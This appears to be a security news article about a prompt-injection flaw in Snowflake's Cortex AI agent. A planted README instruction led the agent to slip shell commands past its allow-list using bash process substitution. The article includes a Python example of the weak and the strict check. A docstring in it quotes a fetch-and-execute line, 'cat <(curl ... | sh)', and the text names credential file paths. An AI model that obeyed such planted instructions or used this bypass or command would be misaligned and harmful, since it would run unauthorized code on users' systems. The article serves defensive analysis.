Cortex AI Prompt Injection Enables Malicious Code Execution
- Snowflake patches prompt injection flaw in Cortex Agent triggered by malicious GitHub README files
- Attack exploited shell process substitution to execute unauthorized code via supposedly safe cat commands
- Security researchers recommend deterministic sandboxing over command allow-lists to prevent future agent escapes
Snowflake has addressed a critical security vulnerability in its Cortex AI agent, following a report detailing how a prompt injection attack could bypass the agent's safety filters and run attacker-supplied shell commands. The attack was demonstrated by giving the agent the task of summarizing a GitHub repository: a hidden instruction planted in the repository's README file steered the agent into executing a malicious shell command.
The bypass targeted the agent's allow-list, a pre-approved set of commands the agent may run without human approval. The cat command (which prints file contents) was on that list, but the attacker wrapped it around bash process substitution, the `<( ... )` syntax. When the shell sees `cat <(some command)`, it runs the inner command first and hands cat a file-like handle to that command's output. A check that approves the invocation because it begins with cat sees a harmless file read, while the shell executes whatever the parentheses contain. The allow-list was checking the name of the command, not what the shell would actually do with the string.
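The following is an added example, not code from Snowflake or the Cortex agent, showing the shape of the bug and a stricter check. The allow-list contents, the weak validator that compares only the leading word, and the choice of bash as the executing shell are assumptions made for illustration.

```python
"""Allow-list bypass via bash process substitution, next to a stricter check.

Added example; not Snowflake's code. ALLOW_LIST, naive_allowed and the
bash-based executor are assumptions that model the class of bug described.
"""
import re
import shlex
import subprocess

# Assumed allow-list of "read-only" commands the agent may run unattended.
ALLOW_LIST = {"cat", "head", "ls"}

# Shell syntax that lets an approved command smuggle another command along:
# process substitution <( ), command substitution $( ) and backticks,
# pipes, separators, redirections and newlines.
SHELL_METACHARS = re.compile(r"[<>|;&`$(){}\n]")


def naive_allowed(cmd: str) -> bool:
    """Weak check: compare only the first word with the allow-list.

    'cat <(curl http://x/y.sh | sh)' starts with 'cat', so it passes, but
    bash runs the inner pipeline while expanding <( ... ) before cat starts.
    """
    tokens = cmd.split()
    return bool(tokens) and tokens[0] in ALLOW_LIST


def naive_run(cmd: str) -> str:
    """Execute through bash, as a shell-string executor would (assumed).

    bash is required here: process substitution is not POSIX sh syntax.
    """
    if not naive_allowed(cmd):
        raise PermissionError(f"not on allow-list: {cmd!r}")
    return subprocess.run(["bash", "-c", cmd], capture_output=True, text=True).stdout


def strict_parse(cmd: str) -> list:
    """Reject anything a shell could expand, then tokenise without a shell.

    shlex.split('cat <(id)') returns ['cat', '<(echo', ...]-style tokens and
    raises nothing, so the metacharacter check must come before tokenising.
    Returns argv suitable for subprocess.run(argv) with shell=False.
    """
    if SHELL_METACHARS.search(cmd):
        raise ValueError(f"shell metacharacter in command: {cmd!r}")
    argv = shlex.split(cmd)
    if not argv or argv[0] not in ALLOW_LIST:
        raise ValueError(f"command not on allow-list: {cmd!r}")
    return argv


def strict_run(cmd: str) -> str:
    """Execute the validated argv directly, so no shell ever sees the string."""
    argv = strict_parse(cmd)
    return subprocess.run(argv, capture_output=True, text=True).stdout


if __name__ == "__main__":
    # Constructed payload: the weak check approves it, and bash executes the
    # inner echo while building the file cat reads.
    payload = "cat <(echo pwned-by-process-substitution)"
    print("naive check passes:", naive_allowed(payload))
    print("naive executor output:", naive_run(payload).strip())
    try:
        strict_run(payload)
    except ValueError as exc:
        print("strict check rejects:", exc)
```

Note that the strict path only removes the shell from the picture; `cat /etc/passwd` or `cat ~/.aws/credentials` is still a valid argv for an allow-listed command. Bounding what the process can read, write and reach over the network is the sandbox's job, not the validator's.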
The incident highlights the fragility of securing AI agents with pattern matching or command allow-lists: a string-level check has to anticipate every way the underlying shell can turn an approved command into an unapproved one. Security researchers, including Simon Willison (a software developer and co-creator of Django), argue that agents should instead operate inside deterministic sandboxes. A sandbox does not stop the prompt injection itself, but by isolating the agent's execution environment (filesystem, network access and credentials) from the host, it limits what a successful injection can reach, so a hijacked command cannot damage the underlying infrastructure.